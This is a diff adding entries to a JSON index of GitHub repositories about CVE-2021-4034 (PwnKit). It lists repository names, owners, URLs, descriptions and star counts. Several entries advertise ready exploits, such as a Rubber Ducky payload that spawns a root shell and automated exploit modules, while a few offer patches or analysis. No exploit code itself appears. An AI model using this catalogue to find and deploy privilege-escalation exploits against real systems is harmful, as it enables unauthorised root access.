+ "updated_at": "2022-02-02T05:38:06Z",
+ "pushed_at": "2022-02-02T05:37:20Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 454711252,
+ "name": "CVE-2021-4034",
+ "full_name": "Ankit-Ojha16\/CVE-2021-4034",
+ "owner": {
+ "login": "Ankit-Ojha16",
+ "id": 60637916,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60637916?v=4",
+ "html_url": "https:\/\/github.com\/Ankit-Ojha16"
+ },
+ "html_url": "https:\/\/github.com\/Ankit-Ojha16\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-02T09:26:24Z",
+ "updated_at": "2022-02-02T09:27:18Z",
+ "pushed_at": "2022-02-02T09:27:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 455010051,
+ "name": "CVE-2021-4034",
+ "full_name": "G01d3nW01f\/CVE-2021-4034",
+ "owner": {
+ "login": "G01d3nW01f",
+ "id": 75846902,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75846902?v=4",
+ "html_url": "https:\/\/github.com\/G01d3nW01f"
+ },
+ "html_url": "https:\/\/github.com\/G01d3nW01f\/CVE-2021-4034",
+ "description": "PwnKit auto generate and Serve",
+ "fork": false,
+ "created_at": "2022-02-03T02:52:20Z",
+ "updated_at": "2023-01-11T15:11:03Z",
+ "pushed_at": "2022-02-03T03:32:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 455445970,
+ "name": "pwnKit",
+ "full_name": "drapl0n\/pwnKit",
+ "owner": {
+ "login": "drapl0n",
+ "id": 87269662,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87269662?v=4",
+ "html_url": "https:\/\/github.com\/drapl0n"
+ },
+ "html_url": "https:\/\/github.com\/drapl0n\/pwnKit",
+ "description": "pwnKit: Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you.",
+ "fork": false,
+ "created_at": "2022-02-04T06:33:24Z",
+ "updated_at": "2024-06-10T17:02:22Z",
+ "pushed_at": "2022-02-08T04:57:32Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "exploit",
+ "hak5-ducky",
+ "payload"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 455655673,
+ "name": "CVE-2021-4034",
+ "full_name": "rvizx\/CVE-2021-4034",
+ "owner": {
+ "login": "rvizx",
+ "id": 84989569,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84989569?v=4",
+ "html_url": "https:\/\/github.com\/rvizx"
+ },
+ "html_url": "https:\/\/github.com\/rvizx\/CVE-2021-4034",
+ "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec in Python",
+ "fork": false,
+ "created_at": "2022-02-04T18:31:15Z",
+ "updated_at": "2024-02-05T22:36:29Z",
+ "pushed_at": "2022-07-19T12:52:30Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "c",
+ "cve-2021-4034",
+ "cybersecurity",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 456253867,
+ "name": "Polkit-CVE-2021-4034-HLP",
+ "full_name": "Joffr3y\/Polkit-CVE-2021-4034-HLP",
+ "owner": {
+ "login": "Joffr3y",
+ "id": 16297240,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16297240?v=4",
+ "html_url": "https:\/\/github.com\/Joffr3y"
+ },
+ "html_url": "https:\/\/github.com\/Joffr3y\/Polkit-CVE-2021-4034-HLP",
+ "description": "Polkit CVE-2021-4034 exploitation in High-Level Programming Language",
+ "fork": false,
+ "created_at": "2022-02-06T19:42:59Z",
+ "updated_at": "2022-02-08T21:24:56Z",
+ "pushed_at": "2022-02-09T07:30:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "exploit",
+ "php",
+ "polkit",
+ "python",
+ "reverse-shell",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 456722456,
+ "name": "polkit_CVE-2021-4034",
+ "full_name": "ziadsaleemi\/polkit_CVE-2021-4034",
+ "owner": {
+ "login": "ziadsaleemi",
+ "id": 23222825,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23222825?v=4",
+ "html_url": "https:\/\/github.com\/ziadsaleemi"
+ },
+ "html_url": "https:\/\/github.com\/ziadsaleemi\/polkit_CVE-2021-4034",
+ "description": "Ansible role to patch RHSB-2022-001 Polkit Privilege Escalation - (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-02-08T00:09:31Z",
+ "updated_at": "2022-02-08T00:09:31Z",
+ "pushed_at": "2022-02-08T18:24:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 456760928,
+ "name": "Pwnkit-go",
+ "full_name": "FDlucifer\/Pwnkit-go",
+ "owner": {
+ "login": "FDlucifer",
+ "id": 45672104,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45672104?v=4",
+ "html_url": "https:\/\/github.com\/FDlucifer"
+ },
+ "html_url": "https:\/\/github.com\/FDlucifer\/Pwnkit-go",
+ "description": "A golang based exp for CVE-2021-4034 dubbed pwnkit (more features added......)",
+ "fork": false,
+ "created_at": "2022-02-08T02:57:12Z",
+ "updated_at": "2023-10-10T14:16:26Z",
+ "pushed_at": "2022-02-08T03:24:51Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458040775,
+ "name": "cve-2021-4034",
+ "full_name": "cspshivam\/cve-2021-4034",
+ "owner": {
+ "login": "cspshivam",
+ "id": 59191514,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59191514?v=4",
+ "html_url": "https:\/\/github.com\/cspshivam"
+ },
+ "html_url": "https:\/\/github.com\/cspshivam\/cve-2021-4034",
+ "description": "pwnkit exploit",
+ "fork": false,
+ "created_at": "2022-02-11T04:06:21Z",
+ "updated_at": "2022-02-15T07:07:15Z",
+ "pushed_at": "2022-02-15T07:09:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458439369,
+ "name": "CVE-2021-4034",
+ "full_name": "an0n7os\/CVE-2021-4034",
+ "owner": {
+ "login": "an0n7os",
+ "id": 67602602,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67602602?v=4",
+ "html_url": "https:\/\/github.com\/an0n7os"
+ },
+ "html_url": "https:\/\/github.com\/an0n7os\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-12T06:20:49Z",
+ "updated_at": "2022-02-12T06:26:41Z",
+ "pushed_at": "2022-02-12T06:26:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458669265,
+ "name": "pwncat_pwnkit",
+ "full_name": "DanaEpp\/pwncat_pwnkit",
+ "owner": {
+ "login": "DanaEpp",
+ "id": 11337016,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11337016?v=4",
+ "html_url": "https:\/\/github.com\/DanaEpp"
+ },
+ "html_url": "https:\/\/github.com\/DanaEpp\/pwncat_pwnkit",
+ "description": "pwncat module that automatically exploits CVE-2021-4034 (pwnkit)",
+ "fork": false,
+ "created_at": "2022-02-13T00:05:32Z",
+ "updated_at": "2024-06-01T16:40:19Z",
+ "pushed_at": "2022-02-13T00:58:32Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 458791188,
+ "name": "CVE-2021-4034",
+ "full_name": "x04000\/CVE-2021-4034",
+ "owner": {
+ "login": "x04000",
+ "id": 78761999,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78761999?v=4",
+ "html_url": "https:\/\/github.com\/x04000"
+ },
+ "html_url": "https:\/\/github.com\/x04000\/CVE-2021-4034",
+ "description": "A simple PWNKIT file to convert you to root ",
+ "fork": false,
+ "created_at": "2022-02-13T11:37:43Z",
+ "updated_at": "2022-02-18T09:29:16Z",
+ "pushed_at": "2022-02-16T19:12:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 458839212,
+ "name": "AutoPwnkit",
+ "full_name": "x04000\/AutoPwnkit",
+ "owner": {
+ "login": "x04000",
+ "id": 78761999,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78761999?v=4",
+ "html_url": "https:\/\/github.com\/x04000"
+ },
+ "html_url": "https:\/\/github.com\/x04000\/AutoPwnkit",
+ "description": "A tool to automate the exploit PWNKIT (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-02-13T14:51:47Z",
+ "updated_at": "2023-08-23T17:21:23Z",
+ "pushed_at": "2022-02-13T15:04:06Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 459341469,
+ "name": "codeql-sample-polkit",
+ "full_name": "hohn\/codeql-sample-polkit",
+ "owner": {
+ "login": "hohn",
+ "id": 2253228,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2253228?v=4",
+ "html_url": "https:\/\/github.com\/hohn"
+ },
+ "html_url": "https:\/\/github.com\/hohn\/codeql-sample-polkit",
+ "description": "All stages of exploring the polkit CVE-2021-4034 using codeql",
+ "fork": false,
+ "created_at": "2022-02-14T22:09:44Z",
+ "updated_at": "2022-04-06T21:01:41Z",
+ "pushed_at": "2022-03-15T18:42:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 459400421,
+ "name": "CVE-2021-4034",
+ "full_name": "ck00004\/CVE-2021-4034",
+ "owner": {
+ "login": "ck00004",
+ "id": 22369720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22369720?v=4",
+ "html_url": "https:\/\/github.com\/ck00004"
+ },
+ "html_url": "https:\/\/github.com\/ck00004\/CVE-2021-4034",
+ "description": "CVE-2021-4034 centos8可用版本",
+ "fork": false,
+ "created_at": "2022-02-15T02:34:48Z",
+ "updated_at": "2024-06-06T04:05:39Z",
+ "pushed_at": "2022-02-15T02:39:28Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 460443117,
+ "name": "CVE-2021-4034",
+ "full_name": "LJP-TW\/CVE-2021-4034",
+ "owner": {
+ "login": "LJP-TW",
+ "id": 26863912,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26863912?v=4",
+ "html_url": "https:\/\/github.com\/LJP-TW"
+ },
+ "html_url": "https:\/\/github.com\/LJP-TW\/CVE-2021-4034",
+ "description": "pkexec EoP exploit",
+ "fork": false,
+ "created_at": "2022-02-17T13:17:07Z",
+ "updated_at": "2022-02-19T08:00:15Z",
+ "pushed_at": "2022-02-18T07:31:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 461568164,
+ "name": "CVE-2021-4034_POC",
+ "full_name": "JoaoFukuda\/CVE-2021-4034_POC",
+ "owner": {
+ "login": "JoaoFukuda",
+ "id": 37672942,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37672942?v=4",
+ "html_url": "https:\/\/github.com\/JoaoFukuda"
+ },
+ "html_url": "https:\/\/github.com\/JoaoFukuda\/CVE-2021-4034_POC",
+ "description": "Proof Of Concept for the 2021's pkexec vulnerability CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-02-20T17:49:21Z",
+ "updated_at": "2022-02-21T12:40:31Z",
+ "pushed_at": "2022-02-20T17:52:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 461952795,
+ "name": "CVE-2021-4034",
+ "full_name": "Tanmay-N\/CVE-2021-4034",
+ "owner": {
+ "login": "Tanmay-N",
+ "id": 36262050,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36262050?v=4",
+ "html_url": "https:\/\/github.com\/Tanmay-N"
+ },
+ "html_url": "https:\/\/github.com\/Tanmay-N\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-21T16:54:38Z",
+ "updated_at": "2022-02-21T16:57:30Z",
+ "pushed_at": "2022-02-21T17:06:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 463357145,
+ "name": "CVE-2021-4034",
+ "full_name": "hahaleyile\/CVE-2021-4034",
+ "owner": {
+ "login": "hahaleyile",
+ "id": 38727644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38727644?v=4",
+ "html_url": "https:\/\/github.com\/hahaleyile"
+ },
+ "html_url": "https:\/\/github.com\/hahaleyile\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-25T01:30:09Z",
+ "updated_at": "2022-06-22T02:55:05Z",
+ "pushed_at": "2022-02-25T01:30:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 464340102,
+ "name": "PwnKit-CVE-2021-4034",
+ "full_name": "movvamrocks\/PwnKit-CVE-2021-4034",
+ "owner": {
+ "login": "movvamrocks",
+ "id": 22263143,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22263143?v=4",
+ "html_url": "https:\/\/github.com\/movvamrocks"
+ },
+ "html_url": "https:\/\/github.com\/movvamrocks\/PwnKit-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-28T04:41:40Z",
+ "updated_at": "2022-02-28T04:46:26Z",
+ "pushed_at": "2022-02-28T04:46:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 465309758,
+ "name": "CVE-2021-4034",
+ "full_name": "Squirre17\/CVE-2021-4034",
+ "owner": {
+ "login": "Squirre17",
+ "id": 79578430,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4",
+ "html_url": "https:\/\/github.com\/Squirre17"
+ },
+ "html_url": "https:\/\/github.com\/Squirre17\/CVE-2021-4034",
+ "description": "polkit-pkexec local privilege escalation vulnerability",
+ "fork": false,
+ "created_at": "2022-03-02T13:07:00Z",
+ "updated_at": "2022-03-02T13:18:31Z",
+ "pushed_at": "2022-03-02T13:19:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 465839695,
+ "name": "make_me_root",
+ "full_name": "Jesrat\/make_me_root",
+ "owner": {
+ "login": "Jesrat",
+ "id": 18082153,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18082153?v=4",
+ "html_url": "https:\/\/github.com\/Jesrat"
+ },
+ "html_url": "https:\/\/github.com\/Jesrat\/make_me_root",
+ "description": "CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-03-03T18:29:11Z",
+ "updated_at": "2022-03-03T19:40:05Z",
+ "pushed_at": "2022-03-03T19:40:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 465973416,
+ "name": "cve-2021-4034",
+ "full_name": "defhacks\/cve-2021-4034",
+ "owner": {
+ "login": "defhacks",
+ "id": 4090053,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4090053?v=4",
+ "html_url": "https:\/\/github.com\/defhacks"
+ },
+ "html_url": "https:\/\/github.com\/defhacks\/cve-2021-4034",
+ "description": "port of CVE-2021-4034 exploit to Rust\/cargo for my own edification",
+ "fork": false,
+ "created_at": "2022-03-04T03:47:53Z",
+ "updated_at": "2022-07-04T19:12:02Z",
+ "pushed_at": "2022-03-04T05:32:29Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 467844609,
+ "name": "Polkit-s-Pkexec-CVE-2021-4034",
+ "full_name": "ITMarcin2211\/Polkit-s-Pkexec-CVE-2021-4034",
+ "owner": {
+ "login": "ITMarcin2211",
+ "id": 60057530,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60057530?v=4",
+ "html_url": "https:\/\/github.com\/ITMarcin2211"
+ },
+ "html_url": "https:\/\/github.com\/ITMarcin2211\/Polkit-s-Pkexec-CVE-2021-4034",
+ "description": "Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching",
+ "fork": false,
+ "created_at": "2022-03-09T08:44:02Z",
+ "updated_at": "2022-03-09T08:51:49Z",
+ "pushed_at": "2022-03-09T08:54:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 468150219,
+ "name": "CVE-2021-4034-Linux",
+ "full_name": "edsonjt81\/CVE-2021-4034-Linux",
+ "owner": {
+ "login": "edsonjt81",
+ "id": 27496739,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4",
+ "html_url": "https:\/\/github.com\/edsonjt81"
+ },
+ "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2021-4034-Linux",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-10T01:24:14Z",
+ "updated_at": "2022-03-10T01:24:25Z",
+ "pushed_at": "2022-03-10T01:24:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469486171,
+ "name": "pwnkit-vulnerability",
+ "full_name": "nel0x\/pwnkit-vulnerability",
+ "owner": {
+ "login": "nel0x",
+ "id": 87320197,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87320197?v=4",
+ "html_url": "https:\/\/github.com\/nel0x"
+ },
+ "html_url": "https:\/\/github.com\/nel0x\/pwnkit-vulnerability",
+ "description": "CVE-2021-4034 (PWNKIT).",
+ "fork": false,
+ "created_at": "2022-03-13T20:24:59Z",
+ "updated_at": "2022-06-06T12:15:58Z",
+ "pushed_at": "2022-03-13T20:25:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 469927703,
+ "name": "CVE-2021-4034",
+ "full_name": "TomSgn\/CVE-2021-4034",
+ "owner": {
+ "login": "TomSgn",
+ "id": 62591045,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62591045?v=4",
+ "html_url": "https:\/\/github.com\/TomSgn"
+ },
+ "html_url": "https:\/\/github.com\/TomSgn\/CVE-2021-4034",
+ "description": "pkexec --> privilege escalation",
+ "fork": false,
+ "created_at": "2022-03-14T22:42:49Z",
+ "updated_at": "2022-03-15T00:22:54Z",
+ "pushed_at": "2022-03-14T22:47:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 470778554,
+ "name": "CVE-2021-4034",
+ "full_name": "battleoverflow\/CVE-2021-4034",
+ "owner": {
+ "login": "battleoverflow",
+ "id": 56496067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56496067?v=4",
+ "html_url": "https:\/\/github.com\/battleoverflow"
+ },
+ "html_url": "https:\/\/github.com\/battleoverflow\/CVE-2021-4034",
+ "description": "CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-03-16T23:05:53Z",
+ "updated_at": "2024-04-14T16:16:44Z",
+ "pushed_at": "2024-04-15T05:58:36Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-4034",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 473151472,
+ "name": "berdav-CVE-2021-4034",
+ "full_name": "TheJoyOfHacking\/berdav-CVE-2021-4034",
+ "owner": {
+ "login": "TheJoyOfHacking",
+ "id": 99463221,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4",
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking"
+ },
+ "html_url": "https:\/\/github.com\/TheJoyOfHacking\/berdav-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-23T11:08:20Z",
+ "updated_at": "2023-10-19T02:17:01Z",
+ "pushed_at": "2022-03-23T11:08:33Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 474372121,
+ "name": "CVE-2021-4034",
+ "full_name": "tzwlhack\/CVE-2021-4034",
+ "owner": {
+ "login": "tzwlhack",
+ "id": 86322859,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4",
+ "html_url": "https:\/\/github.com\/tzwlhack"
+ },
+ "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-26T14:30:11Z",
+ "updated_at": "2022-03-26T14:30:22Z",
+ "pushed_at": "2022-03-26T14:30:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 475232490,
+ "name": "f_poc_cve-2021-4034",
+ "full_name": "jcatala\/f_poc_cve-2021-4034",
+ "owner": {
+ "login": "jcatala",
+ "id": 23392306,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23392306?v=4",
+ "html_url": "https:\/\/github.com\/jcatala"
+ },
+ "html_url": "https:\/\/github.com\/jcatala\/f_poc_cve-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-29T01:06:32Z",
+ "updated_at": "2022-03-31T21:39:25Z",
+ "pushed_at": "2022-03-30T21:12:43Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 476850767,
+ "name": "PwnKit",
+ "full_name": "Nosferatuvjr\/PwnKit",
+ "owner": {
+ "login": "Nosferatuvjr",
+ "id": 67665267,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67665267?v=4",
+ "html_url": "https:\/\/github.com\/Nosferatuvjr"
+ },
+ "html_url": "https:\/\/github.com\/Nosferatuvjr\/PwnKit",
+ "description": "Prova de conceito para a vulnerabilidade Polkit Pkexec: CVE-2021-4034(Pkexec Local Privilege Escalation)",
+ "fork": false,
+ "created_at": "2022-04-01T19:51:18Z",
+ "updated_at": "2022-04-06T09:59:50Z",
+ "pushed_at": "2022-05-27T19:17:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
